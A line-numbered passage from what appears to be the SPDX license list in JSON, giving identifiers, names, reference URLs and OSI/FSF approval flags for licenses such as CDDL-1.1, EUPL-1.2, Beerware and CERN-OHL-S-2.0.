4801 "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
4802 "referenceNumber": 385,
4803 "name": "Common Development and Distribution License 1.1",
4804 "licenseId": "CDDL-1.1",
4805 "seeAlso": [
4806 "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
4807 "https://javaee.github.io/glassfish/LICENSE"
4808 ],
4809 "isOsiApproved": false
4810 },
4811 {
4812 "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
4813 "isDeprecatedLicenseId": false,
4814 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
4815 "referenceNumber": 386,
4816 "name": "GNU Free Documentation License v1.3 only",
4817 "licenseId": "GFDL-1.3-only",
4818 "seeAlso": [
4819 "https://www.gnu.org/licenses/fdl-1.3.txt"
4820 ],
4821 "isOsiApproved": false,
4822 "isFsfLibre": true
4823 },
4824 {
4825 "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
4826 "isDeprecatedLicenseId": false,
4827 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
4828 "referenceNumber": 387,
4829 "name": "Open LDAP Public License v2.6",
4830 "licenseId": "OLDAP-2.6",
4831 "seeAlso": [
4832 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
4833 ],
4834 "isOsiApproved": false
4835 },
4836 {
4837 "reference": "https://spdx.org/licenses/JSON.html",
4838 "isDeprecatedLicenseId": false,
4839 "detailsUrl": "https://spdx.org/licenses/JSON.json",
4840 "referenceNumber": 388,
4841 "name": "JSON License",
4842 "licenseId": "JSON",
4843 "seeAlso": [
4844 "http://www.json.org/license.html"
4845 ],
4846 "isOsiApproved": false
4847 },
4848 {
4849 "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
4850 "isDeprecatedLicenseId": false,
4851 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
4852 "referenceNumber": 389,
4853 "name": "GNU Lesser General Public License v3.0 or later",
4854 "licenseId": "LGPL-3.0-or-later",
4855 "seeAlso": [
4856 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
4857 "https://opensource.org/licenses/LGPL-3.0"
4858 ],
4859 "isOsiApproved": true,
4860 "isFsfLibre": true
4861 },
4862 {
4863 "reference": "https://spdx.org/licenses/GPL-3.0.html",
4864 "isDeprecatedLicenseId": true,
4865 "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
4866 "referenceNumber": 390,
4867 "name": "GNU General Public License v3.0 only",
4868 "licenseId": "GPL-3.0",
4869 "seeAlso": [
4870 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
4871 "https://opensource.org/licenses/GPL-3.0"
4872 ],
4873 "isOsiApproved": true,
4874 "isFsfLibre": true
4875 },
4876 {
4877 "reference": "https://spdx.org/licenses/Fair.html",
4878 "isDeprecatedLicenseId": false,
4879 "detailsUrl": "https://spdx.org/licenses/Fair.json",
4880 "referenceNumber": 391,
4881 "name": "Fair License",
4882 "licenseId": "Fair",
4883 "seeAlso": [
4884 "http://fairlicense.org/",
4885 "https://opensource.org/licenses/Fair"
4886 ],
4887 "isOsiApproved": true
4888 },
4889 {
4890 "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
4891 "isDeprecatedLicenseId": true,
4892 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
4893 "referenceNumber": 392,
4894 "name": "GNU General Public License v2.0 w/Font exception",
4895 "licenseId": "GPL-2.0-with-font-exception",
4896 "seeAlso": [
4897 "https://www.gnu.org/licenses/gpl-faq.html#FontException"
4898 ],
4899 "isOsiApproved": false
4900 },
4901 {
4902 "reference": "https://spdx.org/licenses/OSL-2.1.html",
4903 "isDeprecatedLicenseId": false,
4904 "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
4905 "referenceNumber": 393,
4906 "name": "Open Software License 2.1",
4907 "licenseId": "OSL-2.1",
4908 "seeAlso": [
4909 "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
4910 "https://opensource.org/licenses/OSL-2.1"
4911 ],
4912 "isOsiApproved": true,
4913 "isFsfLibre": true
4914 },
4915 {
4916 "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
4917 "isDeprecatedLicenseId": false,
4918 "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
4919 "referenceNumber": 394,
4920 "name": "LaTeX Project Public License v1.3a",
4921 "licenseId": "LPPL-1.3a",
4922 "seeAlso": [
4923 "http://www.latex-project.org/lppl/lppl-1-3a.txt"
4924 ],
4925 "isOsiApproved": false,
4926 "isFsfLibre": true
4927 },
4928 {
4929 "reference": "https://spdx.org/licenses/NAIST-2003.html",
4930 "isDeprecatedLicenseId": false,
4931 "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
4932 "referenceNumber": 395,
4933 "name": "Nara Institute of Science and Technology License (2003)",
4934 "licenseId": "NAIST-2003",
4935 "seeAlso": [
4936 "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
4937 "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
4938 ],
4939 "isOsiApproved": false
4940 },
4941 {
4942 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
4943 "isDeprecatedLicenseId": false,
4944 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
4945 "referenceNumber": 396,
4946 "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
4947 "licenseId": "CC-BY-NC-ND-4.0",
4948 "seeAlso": [
4949 "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
4950 ],
4951 "isOsiApproved": false
4952 },
4953 {
4954 "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
4955 "isDeprecatedLicenseId": false,
4956 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
4957 "referenceNumber": 397,
4958 "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
4959 "licenseId": "CC-BY-NC-3.0-DE",
4960 "seeAlso": [
4961 "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
4962 ],
4963 "isOsiApproved": false
4964 },
4965 {
4966 "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
4967 "isDeprecatedLicenseId": true,
4968 "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
4969 "referenceNumber": 398,
4970 "name": "GNU Library General Public License v2.1 or later",
4971 "licenseId": "LGPL-2.1+",
4972 "seeAlso": [
4973 "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
4974 "https://opensource.org/licenses/LGPL-2.1"
4975 ],
4976 "isOsiApproved": true
4977 },
4978 {
4979 "reference": "https://spdx.org/licenses/OPL-1.0.html",
4980 "isDeprecatedLicenseId": false,
4981 "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
4982 "referenceNumber": 399,
4983 "name": "Open Public License v1.0",
4984 "licenseId": "OPL-1.0",
4985 "seeAlso": [
4986 "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
4987 "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
4988 ],
4989 "isOsiApproved": false
4990 },
4991 {
4992 "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
4993 "isDeprecatedLicenseId": false,
4994 "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
4995 "referenceNumber": 400,
4996 "name": "Historical Permission Notice and Disclaimer - sell variant",
4997 "licenseId": "HPND-sell-variant",
4998 "seeAlso": [
4999 "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
5000 ],
5001 "isOsiApproved": false
5002 },
5003 {
5004 "reference": "https://spdx.org/licenses/QPL-1.0.html",
5005 "isDeprecatedLicenseId": false,
5006 "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
5007 "referenceNumber": 401,
5008 "name": "Q Public License 1.0",
5009 "licenseId": "QPL-1.0",
5010 "seeAlso": [
5011 "http://doc.qt.nokia.com/3.3/license.html",
5012 "https://opensource.org/licenses/QPL-1.0"
5013 ],
5014 "isOsiApproved": true,
5015 "isFsfLibre": true
5016 },
5017 {
5018 "reference": "https://spdx.org/licenses/EUPL-1.2.html",
5019 "isDeprecatedLicenseId": false,
5020 "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
5021 "referenceNumber": 402,
5022 "name": "European Union Public License 1.2",
5023 "licenseId": "EUPL-1.2",
5024 "seeAlso": [
5025 "https://joinup.ec.europa.eu/page/eupl-text-11-12",
5026 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
5027 "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
5028 "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
5029 "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
5030 "https://opensource.org/licenses/EUPL-1.2"
5031 ],
5032 "isOsiApproved": true
5033 },
5034 {
5035 "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
5036 "isDeprecatedLicenseId": false,
5037 "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
5038 "referenceNumber": 403,
5039 "name": "GNU Free Documentation License v1.2 or later - no invariants",
5040 "licenseId": "GFDL-1.2-no-invariants-or-later",
5041 "seeAlso": [
5042 "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
5043 ],
5044 "isOsiApproved": false
5045 },
5046 {
5047 "reference": "https://spdx.org/licenses/eCos-2.0.html",
5048 "isDeprecatedLicenseId": true,
5049 "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
5050 "referenceNumber": 404,
5051 "name": "eCos license version 2.0",
5052 "licenseId": "eCos-2.0",
5053 "seeAlso": [
5054 "https://www.gnu.org/licenses/ecos-license.html"
5055 ],
5056 "isOsiApproved": false
5057 },
5058 {
5059 "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
5060 "isDeprecatedLicenseId": false,
5061 "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
5062 "referenceNumber": 405,
5063 "name": "Non-Commercial Government Licence",
5064 "licenseId": "NCGL-UK-2.0",
5065 "seeAlso": [
5066 "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
5067 ],
5068 "isOsiApproved": false
5069 },
5070 {
5071 "reference": "https://spdx.org/licenses/Beerware.html",
5072 "isDeprecatedLicenseId": false,
5073 "detailsUrl": "https://spdx.org/licenses/Beerware.json",
5074 "referenceNumber": 406,
5075 "name": "Beerware License",
5076 "licenseId": "Beerware",
5077 "seeAlso": [
5078 "https://fedoraproject.org/wiki/Licensing/Beerware",
5079 "https://people.freebsd.org/~phk/"
5080 ],
5081 "isOsiApproved": false
5082 },
5083 {
5084 "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
5085 "isDeprecatedLicenseId": false,
5086 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
5087 "referenceNumber": 407,
5088 "name": "BSD 3-Clause Open MPI variant",
5089 "licenseId": "BSD-3-Clause-Open-MPI",
5090 "seeAlso": [
5091 "https://www.open-mpi.org/community/license.php",
5092 "http://www.netlib.org/lapack/LICENSE.txt"
5093 ],
5094 "isOsiApproved": false
5095 },
5096 {
5097 "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
5098 "isDeprecatedLicenseId": true,
5099 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
5100 "referenceNumber": 408,
5101 "name": "GNU General Public License v2.0 w/Bison exception",
5102 "licenseId": "GPL-2.0-with-bison-exception",
5103 "seeAlso": [
5104 "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
5105 ],
5106 "isOsiApproved": false
5107 },
5108 {
5109 "reference": "https://spdx.org/licenses/CECILL-B.html",
5110 "isDeprecatedLicenseId": false,
5111 "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
5112 "referenceNumber": 409,
5113 "name": "CeCILL-B Free Software License Agreement",
5114 "licenseId": "CECILL-B",
5115 "seeAlso": [
5116 "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
5117 ],
5118 "isOsiApproved": false,
5119 "isFsfLibre": true
5120 },
5121 {
5122 "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
5123 "isDeprecatedLicenseId": true,
5124 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
5125 "referenceNumber": 410,
5126 "name": "GNU General Public License v2.0 w/Autoconf exception",
5127 "licenseId": "GPL-2.0-with-autoconf-exception",
5128 "seeAlso": [
5129 "http://ac-archive.sourceforge.net/doc/copyright.html"
5130 ],
5131 "isOsiApproved": false
5132 },
5133 {
5134 "reference": "https://spdx.org/licenses/EPL-2.0.html",
5135 "isDeprecatedLicenseId": false,
5136 "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
5137 "referenceNumber": 411,
5138 "name": "Eclipse Public License 2.0",
5139 "licenseId": "EPL-2.0",
5140 "seeAlso": [
5141 "https://www.eclipse.org/legal/epl-2.0",
5142 "https://www.opensource.org/licenses/EPL-2.0"
5143 ],
5144 "isOsiApproved": true,
5145 "isFsfLibre": true
5146 },
5147 {
5148 "reference": "https://spdx.org/licenses/MIT-feh.html",
5149 "isDeprecatedLicenseId": false,
5150 "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
5151 "referenceNumber": 412,
5152 "name": "feh License",
5153 "licenseId": "MIT-feh",
5154 "seeAlso": [
5155 "https://fedoraproject.org/wiki/Licensing/MIT#feh"
5156 ],
5157 "isOsiApproved": false
5158 },
5159 {
5160 "reference": "https://spdx.org/licenses/RPL-1.1.html",
5161 "isDeprecatedLicenseId": false,
5162 "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
5163 "referenceNumber": 413,
5164 "name": "Reciprocal Public License 1.1",
5165 "licenseId": "RPL-1.1",
5166 "seeAlso": [
5167 "https://opensource.org/licenses/RPL-1.1"
5168 ],
5169 "isOsiApproved": true
5170 },
5171 {
5172 "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
5173 "isDeprecatedLicenseId": false,
5174 "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
5175 "referenceNumber": 414,
5176 "name": "Community Data License Agreement Permissive 1.0",
5177 "licenseId": "CDLA-Permissive-1.0",
5178 "seeAlso": [
5179 "https://cdla.io/permissive-1-0"
5180 ],
5181 "isOsiApproved": false
5182 },
5183 {
5184 "reference": "https://spdx.org/licenses/Python-2.0.html",
5185 "isDeprecatedLicenseId": false,
5186 "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
5187 "referenceNumber": 415,
5188 "name": "Python License 2.0",
5189 "licenseId": "Python-2.0",
5190 "seeAlso": [
5191 "https://opensource.org/licenses/Python-2.0"
5192 ],
5193 "isOsiApproved": true,
5194 "isFsfLibre": true
5195 },
5196 {
5197 "reference": "https://spdx.org/licenses/MPL-1.0.html",
5198 "isDeprecatedLicenseId": false,
5199 "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
5200 "referenceNumber": 416,
5201 "name": "Mozilla Public License 1.0",
5202 "licenseId": "MPL-1.0",
5203 "seeAlso": [
5204 "http://www.mozilla.org/MPL/MPL-1.0.html",
5205 "https://opensource.org/licenses/MPL-1.0"
5206 ],
5207 "isOsiApproved": true
5208 },
5209 {
5210 "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
5211 "isDeprecatedLicenseId": false,
5212 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
5213 "referenceNumber": 417,
5214 "name": "GNU Free Documentation License v1.1 or later",
5215 "licenseId": "GFDL-1.1-or-later",
5216 "seeAlso": [
5217 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
5218 ],
5219 "isOsiApproved": false,
5220 "isFsfLibre": true
5221 },
5222 {
5223 "reference": "https://spdx.org/licenses/diffmark.html",
5224 "isDeprecatedLicenseId": false,
5225 "detailsUrl": "https://spdx.org/licenses/diffmark.json",
5226 "referenceNumber": 418,
5227 "name": "diffmark license",
5228 "licenseId": "diffmark",
5229 "seeAlso": [
5230 "https://fedoraproject.org/wiki/Licensing/diffmark"
5231 ],
5232 "isOsiApproved": false
5233 },
5234 {
5235 "reference": "https://spdx.org/licenses/GPL-1.0+.html",
5236 "isDeprecatedLicenseId": true,
5237 "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
5238 "referenceNumber": 419,
5239 "name": "GNU General Public License v1.0 or later",
5240 "licenseId": "GPL-1.0+",
5241 "seeAlso": [
5242 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
5243 ],
5244 "isOsiApproved": false
5245 },
5246 {
5247 "reference": "https://spdx.org/licenses/OpenSSL.html",
5248 "isDeprecatedLicenseId": false,
5249 "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
5250 "referenceNumber": 420,
5251 "name": "OpenSSL License",
5252 "licenseId": "OpenSSL",
5253 "seeAlso": [
5254 "http://www.openssl.org/source/license.html"
5255 ],
5256 "isOsiApproved": false,
5257 "isFsfLibre": true
5258 },
5259 {
5260 "reference": "https://spdx.org/licenses/OSL-1.0.html",
5261 "isDeprecatedLicenseId": false,
5262 "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
5263 "referenceNumber": 421,
5264 "name": "Open Software License 1.0",
5265 "licenseId": "OSL-1.0",
5266 "seeAlso": [
5267 "https://opensource.org/licenses/OSL-1.0"
5268 ],
5269 "isOsiApproved": true,
5270 "isFsfLibre": true
5271 },
5272 {
5273 "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
5274 "isDeprecatedLicenseId": false,
5275 "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
5276 "referenceNumber": 422,
5277 "name": "The Parity Public License 6.0.0",
5278 "licenseId": "Parity-6.0.0",
5279 "seeAlso": [
5280 "https://paritylicense.com/versions/6.0.0.html"
5281 ],
5282 "isOsiApproved": false
5283 },
5284 {
5285 "reference": "https://spdx.org/licenses/AGPL-1.0.html",
5286 "isDeprecatedLicenseId": true,
5287 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
5288 "referenceNumber": 423,
5289 "name": "Affero General Public License v1.0",
5290 "licenseId": "AGPL-1.0",
5291 "seeAlso": [
5292 "http://www.affero.org/oagpl.html"
5293 ],
5294 "isOsiApproved": false,
5295 "isFsfLibre": true
5296 },
5297 {
5298 "reference": "https://spdx.org/licenses/YPL-1.1.html",
5299 "isDeprecatedLicenseId": false,
5300 "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
5301 "referenceNumber": 424,
5302 "name": "Yahoo! Public License v1.1",
5303 "licenseId": "YPL-1.1",
5304 "seeAlso": [
5305 "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
5306 ],
5307 "isOsiApproved": false,
5308 "isFsfLibre": true
5309 },
5310 {
5311 "reference": "https://spdx.org/licenses/SSH-short.html",
5312 "isDeprecatedLicenseId": false,
5313 "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
5314 "referenceNumber": 425,
5315 "name": "SSH short notice",
5316 "licenseId": "SSH-short",
5317 "seeAlso": [
5318 "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
5319 "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
5320 "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
5321 ],
5322 "isOsiApproved": false
5323 },
5324 {
5325 "reference": "https://spdx.org/licenses/IBM-pibs.html",
5326 "isDeprecatedLicenseId": false,
5327 "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
5328 "referenceNumber": 426,
5329 "name": "IBM PowerPC Initialization and Boot Software",
5330 "licenseId": "IBM-pibs",
5331 "seeAlso": [
5332 "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
5333 ],
5334 "isOsiApproved": false
5335 },
5336 {
5337 "reference": "https://spdx.org/licenses/Xnet.html",
5338 "isDeprecatedLicenseId": false,
5339 "detailsUrl": "https://spdx.org/licenses/Xnet.json",
5340 "referenceNumber": 427,
5341 "name": "X.Net License",
5342 "licenseId": "Xnet",
5343 "seeAlso": [
5344 "https://opensource.org/licenses/Xnet"
5345 ],
5346 "isOsiApproved": true
5347 },
5348 {
5349 "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
5350 "isDeprecatedLicenseId": false,
5351 "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
5352 "referenceNumber": 428,
5353 "name": "Technische Universitaet Berlin License 1.0",
5354 "licenseId": "TU-Berlin-1.0",
5355 "seeAlso": [
5356 "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
5357 ],
5358 "isOsiApproved": false
5359 },
5360 {
5361 "reference": "https://spdx.org/licenses/AGPL-3.0.html",
5362 "isDeprecatedLicenseId": true,
5363 "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
5364 "referenceNumber": 429,
5365 "name": "GNU Affero General Public License v3.0",
5366 "licenseId": "AGPL-3.0",
5367 "seeAlso": [
5368 "https://www.gnu.org/licenses/agpl.txt",
5369 "https://opensource.org/licenses/AGPL-3.0"
5370 ],
5371 "isOsiApproved": true,
5372 "isFsfLibre": true
5373 },
5374 {
5375 "reference": "https://spdx.org/licenses/CAL-1.0.html",
5376 "isDeprecatedLicenseId": false,
5377 "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
5378 "referenceNumber": 430,
5379 "name": "Cryptographic Autonomy License 1.0",
5380 "licenseId": "CAL-1.0",
5381 "seeAlso": [
5382 "http://cryptographicautonomylicense.com/license-text.html",
5383 "https://opensource.org/licenses/CAL-1.0"
5384 ],
5385 "isOsiApproved": true
5386 },
5387 {
5388 "reference": "https://spdx.org/licenses/AFL-3.0.html",
5389 "isDeprecatedLicenseId": false,
5390 "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
5391 "referenceNumber": 431,
5392 "name": "Academic Free License v3.0",
5393 "licenseId": "AFL-3.0",
5394 "seeAlso": [
5395 "http://www.rosenlaw.com/AFL3.0.htm",
5396 "https://opensource.org/licenses/afl-3.0"
5397 ],
5398 "isOsiApproved": true,
5399 "isFsfLibre": true
5400 },
5401 {
5402 "reference": "https://spdx.org/licenses/CECILL-C.html",
5403 "isDeprecatedLicenseId": false,
5404 "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
5405 "referenceNumber": 432,
5406 "name": "CeCILL-C Free Software License Agreement",
5407 "licenseId": "CECILL-C",
5408 "seeAlso": [
5409 "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
5410 ],
5411 "isOsiApproved": false,
5412 "isFsfLibre": true
5413 },
5414 {
5415 "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
5416 "isDeprecatedLicenseId": false,
5417 "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
5418 "referenceNumber": 433,
5419 "name": "Open Government Licence v3.0",
5420 "licenseId": "OGL-UK-3.0",
5421 "seeAlso": [
5422 "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
5423 ],
5424 "isOsiApproved": false
5425 },
5426 {
5427 "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
5428 "isDeprecatedLicenseId": false,
5429 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
5430 "referenceNumber": 434,
5431 "name": "BSD 3-Clause Clear License",
5432 "licenseId": "BSD-3-Clause-Clear",
5433 "seeAlso": [
5434 "http://labs.metacarta.com/license-explanation.html#license"
5435 ],
5436 "isOsiApproved": false,
5437 "isFsfLibre": true
5438 },
5439 {
5440 "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
5441 "isDeprecatedLicenseId": false,
5442 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
5443 "referenceNumber": 435,
5444 "name": "BSD 3-Clause Modification",
5445 "licenseId": "BSD-3-Clause-Modification",
5446 "seeAlso": [
5447 "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
5448 ],
5449 "isOsiApproved": false
5450 },
5451 {
5452 "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
5453 "isDeprecatedLicenseId": false,
5454 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
5455 "referenceNumber": 436,
5456 "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
5457 "licenseId": "CC-BY-SA-2.0-UK",
5458 "seeAlso": [
5459 "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
5460 ],
5461 "isOsiApproved": false
5462 },
5463 {
5464 "reference": "https://spdx.org/licenses/Saxpath.html",
5465 "isDeprecatedLicenseId": false,
5466 "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
5467 "referenceNumber": 437,
5468 "name": "Saxpath License",
5469 "licenseId": "Saxpath",
5470 "seeAlso": [
5471 "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
5472 ],
5473 "isOsiApproved": false
5474 },
5475 {
5476 "reference": "https://spdx.org/licenses/NLPL.html",
5477 "isDeprecatedLicenseId": false,
5478 "detailsUrl": "https://spdx.org/licenses/NLPL.json",
5479 "referenceNumber": 438,
5480 "name": "No Limit Public License",
5481 "licenseId": "NLPL",
5482 "seeAlso": [
5483 "https://fedoraproject.org/wiki/Licensing/NLPL"
5484 ],
5485 "isOsiApproved": false
5486 },
5487 {
5488 "reference": "https://spdx.org/licenses/SimPL-2.0.html",
5489 "isDeprecatedLicenseId": false,
5490 "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
5491 "referenceNumber": 439,
5492 "name": "Simple Public License 2.0",
5493 "licenseId": "SimPL-2.0",
5494 "seeAlso": [
5495 "https://opensource.org/licenses/SimPL-2.0"
5496 ],
5497 "isOsiApproved": true
5498 },
5499 {
5500 "reference": "https://spdx.org/licenses/psfrag.html",
5501 "isDeprecatedLicenseId": false,
5502 "detailsUrl": "https://spdx.org/licenses/psfrag.json",
5503 "referenceNumber": 440,
5504 "name": "psfrag License",
5505 "licenseId": "psfrag",
5506 "seeAlso": [
5507 "https://fedoraproject.org/wiki/Licensing/psfrag"
5508 ],
5509 "isOsiApproved": false
5510 },
5511 {
5512 "reference": "https://spdx.org/licenses/Spencer-86.html",
5513 "isDeprecatedLicenseId": false,
5514 "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
5515 "referenceNumber": 441,
5516 "name": "Spencer License 86",
5517 "licenseId": "Spencer-86",
5518 "seeAlso": [
5519 "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
5520 ],
5521 "isOsiApproved": false
5522 },
5523 {
5524 "reference": "https://spdx.org/licenses/OCCT-PL.html",
5525 "isDeprecatedLicenseId": false,
5526 "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
5527 "referenceNumber": 442,
5528 "name": "Open CASCADE Technology Public License",
5529 "licenseId": "OCCT-PL",
5530 "seeAlso": [
5531 "http://www.opencascade.com/content/occt-public-license"
5532 ],
5533 "isOsiApproved": false
5534 },
5535 {
5536 "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
5537 "isDeprecatedLicenseId": false,
5538 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
5539 "referenceNumber": 443,
5540 "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
5541 "licenseId": "CERN-OHL-S-2.0",
5542 "seeAlso": [
5543 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
5544 ],
5545 "isOsiApproved": true
5546 },
5547 {
5548 "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
5549 "isDeprecatedLicenseId": false,
5550 "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
5551 "referenceNumber": 444,
5552 "name": "Erlang Public License v1.1",
5553 "licenseId": "ErlPL-1.1",
5554 "seeAlso": [
5555 "http://www.erlang.org/EPLICENSE"
5556 ],
5557 "isOsiApproved": false
5558 },
5559 {
5560 "reference": "https://spdx.org/licenses/MIT-CMU.html",
5561 "isDeprecatedLicenseId": false,
5562 "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
5563 "referenceNumber": 445,
5564 "name": "CMU License",
5565 "licenseId": "MIT-CMU",
5566 "seeAlso": [
5567 "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
5568 "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
5569 ],
5570 "isOsiApproved": false
5571 },
5572 {
5573 "reference": "https://spdx.org/licenses/NIST-PD.html",
5574 "isDeprecatedLicenseId": false,
5575 "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
5576 "referenceNumber": 446,
5577 "name": "NIST Public Domain Notice",
5578 "licenseId": "NIST-PD",
5579 "seeAlso": [
